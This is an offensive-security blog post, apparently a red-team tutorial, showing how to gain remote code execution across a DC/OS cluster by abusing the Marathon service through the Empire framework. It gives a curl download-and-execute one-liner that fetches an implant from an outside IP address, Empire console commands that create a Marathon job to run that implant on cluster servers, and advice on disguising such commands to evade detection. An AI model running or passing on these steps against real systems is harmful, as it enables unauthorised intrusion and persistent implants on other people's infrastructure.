OWNerchestration - Marathon (ab)Use

We can gain Remote Code Execution (RCE) on servers within the cluster using the Marathon service. Marathon is usually the first framework to be launched and generally runs directly alongside Mesos to help ensure services, containers, and frameworks continue operating indefinitely.

An attacker by default can interact with the Marathon service to gain RCE on servers within the cluster using the following techniques within Empire. In these examples we are going to execute the following malicious command that will download and execute our ELF Empire binary onto the remote servers within the DC/OS cluster…

curl -o /tmp/emPyre -s http://138.68.47.120:8000/emPyre && chmod +x /tmp/emPyre && /tmp/emPyre

This is not the stealthiest and/or OPSEC friendliest way to get RCE on these endpoints, but this process can be easily be improved to blend into target environments by carefully analyzing the existing jobs that are listed via the Marathon service and then crafting a series of commands that will look more benign for the given target network. This exercise is left up to the reader.

List Marathon Jobs

We can use the “http_rest_api” module to list Marathon jobs using the following commands…

(Empire)> agents
(Empire: agents)> interact IHCY2HLZ
(Empire: IHCY2HLZ)> usemodule situational_awareness/network/http_rest_api
(Empire: python/situational_awareness/network/http_rest_api)> set RequMethod GET
(Empire: python/situational_awareness/network/http_rest_api)> set Protocol http
(Empire: python/situational_awareness/network/http_rest_api)> set Target marathon.mesos
(Empire: python/situational_awareness/network/http_rest_api)> set Path /v2/apps
(Empire: python/situational_awareness/network/http_rest_api)> set Port 8080
(Empire: python/situational_awareness/network/http_rest_api)> execute

Add Marathon Job

We can use the “marathon_api_create_start_app” module to add a Marathon job using the following commands…

(Empire)> agents
(Empire: agents)> interact IHCY2HLZ
(Empire: IHCY2HLZ)> usemodule situational_awareness/network/dcos/marathon_api_create_start_app
(Empire: python/situational_awareness/network/dcos/marathon_api_create_start_app)> set Cmd curl -o /tmp/emPyre -s http://138.68.47.120:8000/emPyre && chmod +x /tmp/emPyre && /tmp/emPyre
(Empire: python/situational_awareness/network/dcos/marathon_api_create_start_app)> execute

Delete a Marathon Job

We can use the “http_rest_api” module to deleta a Marathon job using the following commands…

(Empire)> agents
(Empire: agents)> interact IHCY2HLZ
(Empire: IHCY2HLZ)> usemodule situational_awareness/network/http_rest_api
(Empire: python/situational_awareness/network/http_rest_api)> set RequMethod DELETE
(Empire: python/situational_awareness/network/http_rest_api)> set Protocol http
(Empire: python/situational_awareness/network/http_rest_api)> set Target marathon.mesos
(Empire: python/situational_awareness/network/http_rest_api)> set Path /v2/apps/app001
(Empire: python/situational_awareness/network/http_rest_api)> set Port 8080
(Empire: python/situational_awareness/network/http_rest_api)> execute

Demo

You can see a quick demo of this process in the following video…

Bryce KunzComment